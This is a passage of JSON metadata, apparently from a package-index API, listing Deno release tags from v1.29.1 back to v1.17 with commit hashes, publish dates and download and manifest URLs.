url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.